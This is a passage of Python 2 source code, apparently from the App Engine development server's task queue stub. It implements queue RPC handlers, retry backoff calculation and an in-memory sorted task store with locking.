response = self._ValidateQueueName(queue_name)
if response != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(response)
def _ChooseTaskName(self):
"""Returns a string containing a unique task name."""
self._next_task_id += 1
return 'task%d' % (self._next_task_id - 1)
def _VerifyTaskQueueAddRequest(self, request, now):
"""Checks that a TaskQueueAddRequest is valid.
Checks that a TaskQueueAddRequest specifies a valid eta and a valid queue.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest to validate.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A taskqueue_service_pb.TaskQueueServiceError indicating any problems with
the request or taskqueue_service_pb.TaskQueueServiceError.OK if it is
valid.
"""
if request.eta_usec() < 0:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(request.eta_usec()))
max_eta = now + MAX_ETA
if eta > max_eta:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
queue_name_response = self._ValidateQueueName(request.queue_name())
if queue_name_response != taskqueue_service_pb.TaskQueueServiceError.OK:
return queue_name_response
if request.has_crontimetable() and self._app_id is None:
return taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED
if request.mode() == QUEUE_MODE.PULL:
max_task_size_bytes = MAX_PULL_TASK_SIZE_BYTES
else:
max_task_size_bytes = MAX_PUSH_TASK_SIZE_BYTES
if request.ByteSize() > max_task_size_bytes:
return taskqueue_service_pb.TaskQueueServiceError.TASK_TOO_LARGE
return taskqueue_service_pb.TaskQueueServiceError.OK
def BulkAdd_Rpc(self, request, response):
"""Add many tasks to a queue using a single request.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
self._ReloadQueuesFromYaml()
if not request.add_request(0).queue_name():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
error_found = False
task_results_with_chosen_names = set()
now = datetime.datetime.utcfromtimestamp(time.time())
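    # First pass: validate every add_request. Valid entries are provisionally
    # marked SKIPPED and only flipped to OK after the whole batch has been
    # added below; invalid entries keep their error code and abort the batch.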
for add_request in request.add_request_list():
task_result = response.add_taskresult()
result = self._VerifyTaskQueueAddRequest(add_request, now)
if result == taskqueue_service_pb.TaskQueueServiceError.OK:
if not add_request.task_name():
chosen_name = self._ChooseTaskName()
add_request.set_task_name(chosen_name)
task_results_with_chosen_names.add(id(task_result))
task_result.set_result(
taskqueue_service_pb.TaskQueueServiceError.SKIPPED)
else:
error_found = True
task_result.set_result(result)
if error_found:
return
if request.add_request(0).has_transaction():
self._TransactionalBulkAdd(request)
else:
self._NonTransactionalBulkAdd(request, response, now)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
if (task_result.result() ==
taskqueue_service_pb.TaskQueueServiceError.SKIPPED):
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if id(task_result) in task_results_with_chosen_names:
task_result.set_chosen_task_name(add_request.task_name())
def _TransactionalBulkAdd(self, request):
"""Uses datastore.AddActions to associate tasks with a transaction.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
assigned unique names.
"""
try:
apiproxy_stub_map.MakeSyncCall(
'datastore_v3', 'AddActions', request, api_base_pb.VoidProto())
except apiproxy_errors.ApplicationError, e:
raise apiproxy_errors.ApplicationError(
e.application_error +
taskqueue_service_pb.TaskQueueServiceError.DATASTORE_ERROR,
e.error_detail)
def _NonTransactionalBulkAdd(self, request, response, now):
"""Adds tasks to the appropriate _Queue instance.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
those with empty names have been assigned unique names.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse to populate
with the results. N.B. the chosen_task_name field in the response will
not be filled-in.
now: A datetime.datetime object containing the current time in UTC.
"""
queue_mode = request.add_request(0).mode()
queue_name = request.add_request(0).queue_name()
store = self._queues[queue_name]
if store.queue_mode != queue_mode:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
try:
store.Add(add_request, now)
except apiproxy_errors.ApplicationError, e:
task_result.set_result(e.application_error)
else:
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if (store.queue_mode == QUEUE_MODE.PUSH and
store.Oldest() == add_request.eta_usec()):
self._update_newest_eta(_UsecToSec(add_request.eta_usec()))
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
    queue_name = request.queue_name()
    # Use a separate name for the validation result so the response protobuf
    # parameter is not shadowed.
    error_code = self._ValidateQueueName(queue_name)
    is_unknown_queue = (
        error_code == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
    if error_code != taskqueue_service_pb.TaskQueueServiceError.OK and (
        not is_unknown_queue):
      raise apiproxy_errors.ApplicationError(error_code)
if is_unknown_queue:
self._queues[queue_name] = _Queue(request.queue_name())
if self._app_id is not None:
self._queues[queue_name].Populate(random.randint(10, 100))
self._queues[queue_name].UpdateQueue_Rpc(request, response)
def FetchQueues_Rpc(self, request, response):
"""Implementation of the FetchQueues RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._ReloadQueuesFromYaml()
for queue_name in sorted(self._queues):
if response.queue_size() > request.max_rows():
break
if self._queues[queue_name] is None:
continue
self._queues[queue_name].FetchQueues_Rpc(request, response)
def FetchQueueStats_Rpc(self, request, response):
"""Implementation of the FetchQueueStats rpc which returns 'random' data.
This implementation loads some stats from the task store, the rest are
random numbers.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
for queue_name in request.queue_name_list():
stats = response.add_queuestats()
if queue_name not in self._queues:
stats.set_num_tasks(0)
stats.set_oldest_eta_usec(-1)
continue
store = self._queues[queue_name]
stats.set_num_tasks(store.Count())
if stats.num_tasks() == 0:
stats.set_oldest_eta_usec(-1)
else:
stats.set_oldest_eta_usec(store.Oldest())
if random.randint(0, 9) > 0:
scanner_info = stats.mutable_scanner_info()
scanner_info.set_executed_last_minute(random.randint(0, 10))
scanner_info.set_executed_last_hour(scanner_info.executed_last_minute()
+ random.randint(0, 100))
scanner_info.set_sampling_duration_seconds(random.random() * 10000.0)
scanner_info.set_requests_in_flight(random.randint(0, 10))
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryTasks_Rpc(request, response)
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._ReloadQueuesFromYaml()
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].FetchTask_Rpc(request, response)
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._ReloadQueuesFromYaml()
def _AddResultForAll(result):
for _ in request.task_name_list():
response.add_result(result)
if request.queue_name() not in self._queues:
_AddResultForAll(taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
elif self._queues[request.queue_name()] is None:
_AddResultForAll(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE)
else:
self._queues[request.queue_name()].Delete_Rpc(request, response)
def DeleteQueue_Rpc(self, request, response):
"""Implementation of the DeleteQueue RPC.
Tombstones the queue.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()] = None
def PauseQueue_Rpc(self, request, response):
"""Implementation of the PauseQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].paused = request.pause()
def PurgeQueue_Rpc(self, request, response):
"""Implementation of the PurgeQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].PurgeQueue()
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryAndOwnTasks_Rpc(request, response)
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].ModifyTaskLease_Rpc(request, response)
class Retry(object):
"""Task retry caclulator class.
Determines if and when a task should next be run
"""
_default_params = taskqueue_service_pb.TaskQueueRetryParameters()
_default_params.set_min_backoff_sec(0.001)
_default_params.set_max_backoff_sec(3600)
_default_params.set_max_doublings(100000)
def __init__(self, task, queue):
"""Constructor.
Args:
task: A taskqueue_service_pb.TaskQueueQueryTasksResponse_Task instance.
May be None.
queue: A _Queue instance. May be None.
"""
if task is not None and task.has_retry_parameters():
self._params = task.retry_parameters()
elif queue is not None and queue.retry_parameters is not None:
self._params = queue.retry_parameters
else:
self._params = self._default_params
def CanRetry(self, retry_count, age_usec):
"""Computes whether a task can be retried.
Args:
retry_count: An integer specifying which retry this is.
age_usec: An integer specifying the microseconds since the first try.
Returns:
True if a task is eligible for retrying.
"""
if self._params.has_retry_limit() and self._params.has_age_limit_sec():
return (self._params.retry_limit() >= retry_count or
self._params.age_limit_sec() >= _UsecToSec(age_usec))
if self._params.has_retry_limit():
return self._params.retry_limit() >= retry_count
if self._params.has_age_limit_sec():
return self._params.age_limit_sec() >= _UsecToSec(age_usec)
return True
def CalculateBackoffUsec(self, retry_count):
"""Calculates time before the specified retry.
Args:
retry_count: An integer specifying which retry this is.
Returns:
The number of microseconds before a task should be retried.
"""
exponent = min(retry_count - 1, self._params.max_doublings())
linear_steps = retry_count - exponent
min_backoff_usec = _SecToUsec(self._params.min_backoff_sec())
max_backoff_usec = _SecToUsec(self._params.max_backoff_sec())
backoff_usec = min_backoff_usec
if exponent > 0:
backoff_usec *= (2 ** (min(1023, exponent)))
if linear_steps > 1:
backoff_usec *= linear_steps
return int(min(max_backoff_usec, backoff_usec))
class _Queue(object):
"""A Taskqueue Queue.
This class contains all of the properties of a queue and a sorted list of
tasks.
"""
def __init__(self, queue_name, bucket_refill_per_second=DEFAULT_RATE_FLOAT,
bucket_capacity=DEFAULT_BUCKET_SIZE,
user_specified_rate=DEFAULT_RATE, retry_parameters=None,
max_concurrent_requests=None, paused=False,
queue_mode=QUEUE_MODE.PUSH, acl=None,
_testing_validate_state=None):
self.queue_name = queue_name
self.bucket_refill_per_second = bucket_refill_per_second
self.bucket_capacity = bucket_capacity
self.user_specified_rate = user_specified_rate
self.retry_parameters = retry_parameters
self.max_concurrent_requests = max_concurrent_requests
self.paused = paused
self.queue_mode = queue_mode
self.acl = acl
self._testing_validate_state = _testing_validate_state
self.task_name_archive = set()
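    # Three parallel indexes over the same task protobufs, each kept sorted so
    # bisect can be used for lookups:
    #   _sorted_by_name: (task_name, task)
    #   _sorted_by_eta:  (eta_usec, task_name, task)
    #   _sorted_by_tag:  (tag, eta_usec, task_name, task) -- tagged tasks only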
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
self._lock = threading.Lock()
def VerifyIndexes(self):
"""Ensures that all three indexes are in a valid state.
This method is used by internal tests and should not need to be called in
any other circumstances.
Raises:
AssertionError: if the indexes are not in a valid state.
"""
assert self._IsInOrder(self._sorted_by_name)
assert self._IsInOrder(self._sorted_by_eta)
assert self._IsInOrder(self._sorted_by_tag)
tasks_by_name = set()
tasks_with_tags = set()
for name, task in self._sorted_by_name:
assert name == task.task_name()
assert name not in tasks_by_name
tasks_by_name.add(name)
if task.has_tag():
tasks_with_tags.add(name)
tasks_by_eta = set()
for eta, name, task in self._sorted_by_eta:
assert name == task.task_name()
assert eta == task.eta_usec()
assert name not in tasks_by_eta
tasks_by_eta.add(name)
assert tasks_by_eta == tasks_by_name
tasks_by_tag = set()
for tag, eta, name, task in self._sorted_by_tag:
assert name == task.task_name()
assert eta == task.eta_usec()
assert task.has_tag() and task.tag()
assert tag == task.tag()
assert name not in tasks_by_tag
tasks_by_tag.add(name)
assert tasks_by_tag == tasks_with_tags
@staticmethod
def _IsInOrder(l):
"""Determine if the specified list is in ascending order.
Args:
l: The list to check
Returns:
True if the list is in order, False otherwise
"""
sorted_list = sorted(l)
return l == sorted_list
def _WithLock(f):
"""Runs the decorated function within self._lock.
Args:
f: The function to be delegated to. Must be a member function (take self
as the first parameter).
Returns:
The result of f.
"""
def _Inner(self, *args, **kwargs):
with self._lock:
ret = f(self, *args, **kwargs)
if self._testing_validate_state:
self.VerifyIndexes()
return ret
_Inner.__doc__ = f.__doc__
return _Inner
@_WithLock
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
assert request.queue_name() == self.queue_name
self.bucket_refill_per_second = request.bucket_refill_per_second()
self.bucket_capacity = request.bucket_capacity()
if request.has_user_specified_rate():
self.user_specified_rate = request.user_specified_rate()
else:
self.user_specified_rate = None
if request.has_retry_parameters():
self.retry_parameters = request.retry_parameters()
else:
self.retry_parameters = None
if request.has_max_concurrent_requests():
self.max_concurrent_requests = request.max_concurrent_requests()
else:
self.max_concurrent_requests = None
self.queue_mode = request.mode()
if request.has_acl():
self.acl = request.acl()
else:
self.acl = None
@_WithLock
def FetchQueues_Rpc(self, request, response):
"""Fills out a queue message on the provided TaskQueueFetchQueuesResponse.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
response_queue = response.add_queue()
response_queue.set_queue_name(self.queue_name)
response_queue.set_bucket_refill_per_second(
self.bucket_refill_per_second)
response_queue.set_bucket_capacity(self.bucket_capacity)
if self.user_specified_rate is not None:
response_queue.set_user_specified_rate(self.user_specified_rate)
if self.max_concurrent_requests is not None:
response_queue.set_max_concurrent_requests(
self.max_concurrent_requests)
if self.retry_parameters is not None:
response_queue.retry_parameters().CopyFrom(self.retry_parameters)
response_queue.set_paused(self.paused)
if self.queue_mode is not None:
response_queue.set_mode(self.queue_mode)
if self.acl is not None:
response_queue.mutable_acl().CopyFrom(self.acl)
@_WithLock
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
assert not request.has_start_tag()
if request.has_start_eta_usec():
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name(),
eta=request.start_eta_usec())
else:
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name())
for task in tasks:
response.add_task().MergeFrom(task)
@_WithLock
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
task_name = request.task_name()
pos = self._LocateTaskByName(task_name)
if pos is None:
if task_name in self.task_name_archive:
error = taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
error = taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
raise apiproxy_errors.ApplicationError(error)
_, task = self._sorted_by_name[pos]
response.mutable_task().add_task().CopyFrom(task)
@_WithLock
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store. We mimic a 1/20 chance of a
TRANSIENT_ERROR when the request has an app_id.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
for taskname in request.task_name_list():
if request.has_app_id() and random.random() <= 0.05:
response.add_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
else:
response.add_result(self._DeleteNoAcquireLock(taskname))
def _QueryAndOwnTasksGetTaskList(self, max_rows, group_by_tag, now_eta_usec,
tag=None):
assert self._lock.locked()
if group_by_tag and tag:
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, None, None,),
end_key=(tag, now_eta_usec, None,),
max_rows=max_rows)
elif group_by_tag:
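      # group_by_tag without an explicit tag: find the oldest available task;
      # if it is tagged, lease only tasks sharing that tag, otherwise lease
      # only untagged tasks.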
tasks = self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
if not tasks:
return []
if tasks[0].has_tag():
tag = tasks[0].tag()
return self._QueryAndOwnTasksGetTaskList(
max_rows, True, now_eta_usec, tag)
else:
return [task for task in tasks if not task.has_tag()]
else:
return self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
@_WithLock
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
max_tasks = request.max_tasks()
if max_tasks <= 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
if request.has_tag() and not request.group_by_tag():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST,
'Tag specified, but group_by_tag was not.')
now_eta_usec = _SecToUsec(time.time())
tasks = self._QueryAndOwnTasksGetTaskList(
max_tasks, request.group_by_tag(), now_eta_usec, request.tag())
tasks_to_delete = []
for task in tasks:
retry = Retry(task, self)
if not retry.CanRetry(task.retry_count() + 1, 0):
logging.warning(
'Task %s in queue %s cannot be leased again after %d leases.',
task.task_name(), self.queue_name, task.retry_count())
tasks_to_delete.append(task)
continue
self._PostponeTaskNoAcquireLock(
task, now_eta_usec + _SecToUsec(lease_seconds))
task_response = response.add_task()
task_response.set_task_name(task.task_name())
task_response.set_eta_usec(task.eta_usec())
task_response.set_retry_count(task.retry_count())
if task.has_tag():
task_response.set_tag(task.tag())
task_response.set_body(task.body())
for task in tasks_to_delete:
self._DeleteNoAcquireLock(task.task_name())
@_WithLock
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
      request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
      response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
if self.paused:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.QUEUE_PAUSED)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
pos = self._LocateTaskByName(request.task_name())
if pos is None:
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK)
_, task = self._sorted_by_name[pos]
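    # The stored eta effectively acts as the lease handle: if it no longer
    # matches the eta the caller saw, the lease has been superseded.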
if task.eta_usec() != request.eta_usec():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
now_usec = _SecToUsec(time.time())
if task.eta_usec() < now_usec:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
future_eta_usec = now_usec + _SecToUsec(lease_seconds)
self._PostponeTaskNoAcquireLock(
task, future_eta_usec, increase_retries=False)
response.set_updated_eta_usec(future_eta_usec)
@_WithLock
def IncRetryCount(self, task_name):
"""Increment the retry count of a task by 1.
Args:
task_name: The name of the task to update.
"""
pos = self._LocateTaskByName(task_name)
assert pos is not None, (
'Task does not exist when trying to increase retry count.')
task = self._sorted_by_name[pos][1]
self._IncRetryCount(task)
def _IncRetryCount(self, task):
assert self._lock.locked()
retry_count = task.retry_count()
task.set_retry_count(retry_count + 1)
@_WithLock
def GetTasksAsDicts(self):
"""Gets all of the tasks in this queue.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
        'headers': [('user-header', 'some-value'),
                    ('X-AppEngine-QueueName', 'update-queue'),
                    ('X-AppEngine-TaskName', 'task-123'),
                    ('X-AppEngine-TaskRetryCount', '0'),
                    ('X-AppEngine-Development-Payload', '1'),
                    ('Content-Length', 0),
                    ('Content-Type', 'application/octet-stream')]}, ...]
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
tasks = []
now = datetime.datetime.utcnow()
for _, _, task_response in self._sorted_by_eta:
tasks.append(QueryTasksResponseToDict(
self.queue_name, task_response, now))
return tasks
@_WithLock
def GetTaskAsDict(self, task_name):
"""Gets a specific task from this queue.
Returns:
A dictionary containing one task's attributes. E.g.
      {'name': 'task-123',
       'queue_name': 'default',
       'url': '/update',
       'method': 'GET',
       'eta': '2009/02/02 05:37:42',
       'eta_delta': '0:00:06.342511 ago',
       'body': '',
       'headers': [('user-header', 'some-value'),
                   ('X-AppEngine-QueueName', 'update-queue'),
                   ('X-AppEngine-TaskName', 'task-123'),
                   ('X-AppEngine-TaskRetryCount', '0'),
                   ('X-AppEngine-Development-Payload', '1'),
                   ('Content-Length', 0),
                   ('Content-Type', 'application/octet-stream')]}
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
task_responses = self._LookupNoAcquireLock(maximum=1, name=task_name)
if not task_responses:
return
task_response, = task_responses
if task_response.task_name() != task_name:
return
now = datetime.datetime.utcnow()
return QueryTasksResponseToDict(self.queue_name, task_response, now)
@_WithLock
def PurgeQueue(self):
"""Removes all content from the queue."""
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
@_WithLock
def _GetTasks(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
return self._GetTasksNoAcquireLock()
def _GetTasksNoAcquireLock(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
assert self._lock.locked()
tasks = []
for eta, task_name, task in self._sorted_by_eta:
tasks.append(task)
return tasks
def _InsertTask(self, task):
"""Insert a task into the store, keeps lists sorted.
Args:
task: the new task.
"""
assert self._lock.locked()
eta = task.eta_usec()
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (eta, name, task))
if task.has_tag():
bisect.insort_left(self._sorted_by_tag, (task.tag(), eta, name, task))
bisect.insort_left(self._sorted_by_name, (name, task))
self.task_name_archive.add(name)
@_WithLock
def PostponeTask(self, task, new_eta_usec):
"""Postpone the task to a future time and increment the retry count.
Args:
task: The TaskQueueQueryTasksResponse_Task to postpone. This must be
stored in this queue (otherwise an AssertionError is raised).
      new_eta_usec: The new eta to set on the task. This must be greater than
        the current eta on the task.
"""
assert new_eta_usec > task.eta_usec()
self._PostponeTaskNoAcquireLock(task, new_eta_usec)
def _PostponeTaskNoAcquireLock(self, task, new_eta_usec,
increase_retries=True):
assert self._lock.locked()
if increase_retries:
self._IncRetryCount(task)
name = task.task_name()
eta = task.eta_usec()
assert self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), task)
if task.has_tag():
assert self._RemoveTaskFromIndex(
self._sorted_by_tag, (task.tag(), eta, name, None), task)
self._PostponeTaskInsertOnly(task, new_eta_usec)
def _PostponeTaskInsertOnly(self, task, new_eta_usec):
assert self._lock.locked()
task.set_eta_usec(new_eta_usec)
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (new_eta_usec, name, task))
if task.has_tag():
tag = task.tag()
bisect.insort_left(self._sorted_by_tag, (tag, new_eta_usec, name, task))
@_WithLock
def Lookup(self, maximum, name=None, eta=None):
"""Lookup a number of sorted tasks from the store.
If 'eta' is specified, the tasks are looked up in a list sorted by 'eta',
then 'name'. Otherwise they are sorted by 'name'. We need to be able to
sort by 'eta' and 'name' because tasks can have identical eta. If you had
20 tasks with the same ETA, you wouldn't be able to page past them, since
the 'next eta' would give the first one again. Names are unique, though.
Args:
maximum: the maximum number of tasks to return.
name: a task name to start with.
eta: an eta to start with.
Returns:
A list of up to 'maximum' tasks.
Raises:
ValueError: if the task store gets corrupted.
"""
return self._LookupNoAcquireLock(maximum, name, eta)
def _IndexScan(self, index, start_key, end_key=None, max_rows=None):
"""Return the result of a 'scan' over the given index.
The scan is inclusive of start_key and exclusive of end_key. It returns at
most max_rows from the index.
Args:
index: One of the index lists, eg self._sorted_by_tag.
start_key: The key to start at.
end_key: Optional end key.
max_rows: The maximum number of rows to yield.
Returns:
a list of up to 'max_rows' TaskQueueQueryTasksResponse_Task instances from
the given index, in sorted order.
"""
assert self._lock.locked()
start_pos = bisect.bisect_left(index, start_key)
end_pos = INF
if end_key is not None:
end_pos = bisect.bisect_left(index, end_key)
if max_rows is not None:
end_pos = min(end_pos, start_pos + max_rows)
end_pos = min(end_pos, len(index))
tasks = []
for pos in xrange(start_pos, end_pos):
tasks.append(index[pos][-1])
return tasks
def _LookupNoAcquireLock(self, maximum, name=None, eta=None, tag=None):
assert self._lock.locked()
if tag is not None:
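      # tag + '\x00' is the smallest string that sorts strictly after tag
      # itself, so the scan covers exactly the entries carrying this tag.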
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, eta, name,),
end_key=('%s\x00' % tag, None, None,),
max_rows=maximum)
elif eta is not None:
return self._IndexScan(self._sorted_by_eta,
start_key=(eta, name,),
max_rows=maximum)
else:
return self._IndexScan(self._sorted_by_name,
start_key=(name,),
max_rows=maximum)
@_WithLock
def Count(self):
"""Returns the number of tasks in the store."""
return len(self._sorted_by_name)
@_WithLock
def OldestTask(self):
"""Returns the task with the oldest eta in the store."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][2]
return None
@_WithLock
def Oldest(self):
"""Returns the oldest eta in the store, or None if no tasks."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][0]
return None
def _LocateTaskByName(self, task_name):
"""Locate the index of a task in _sorted_by_name list.
If the task does not exist in the list, return None.
Args:
task_name: Name of task to be located.
Returns:
Index of the task in _sorted_by_name list if task exists,
None otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(self._sorted_by_name, (task_name,))
if (pos >= len(self._sorted_by_name) or
self._sorted_by_name[pos][0] != task_name):
return None
return pos
@_WithLock
def Add(self, request, now):
"""Inserts a new task into the store.
Args:
request: A taskqueue_service_pb.TaskQueueAddRequest.
now: A datetime.datetime object containing the current time in UTC.
Raises:
apiproxy_errors.ApplicationError: If a task with the same name is already
in the store, or the task is tombstoned.
"""
if self._LocateTaskByName(request.task_name()) is not None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_ALREADY_EXISTS)
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
now_sec = calendar.timegm(now.utctimetuple())
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(request.task_name())
task.set_eta_usec(request.eta_usec())
task.set_creation_time_usec(_SecToUsec(now_sec))
task.set_retry_count(0)
task.set_method(request.method())
if request.has_url():
task.set_url(request.url())
for keyvalue in request.header_list():
header = task.add_header()
header.set_key(keyvalue.key())
header.set_value(keyvalue.value())
if request.has_description():
task.set_description(request.description())
if request.has_body():
task.set_body(request.body())
if request.has_crontimetable():
task.mutable_crontimetable().set_schedule(
request.crontimetable().schedule())
task.mutable_crontimetable().set_timezone(
request.crontimetable().timezone())
if request.has_retry_parameters():
task.mutable_retry_parameters().CopyFrom(request.retry_parameters())
if request.has_tag():
task.set_tag(request.tag())
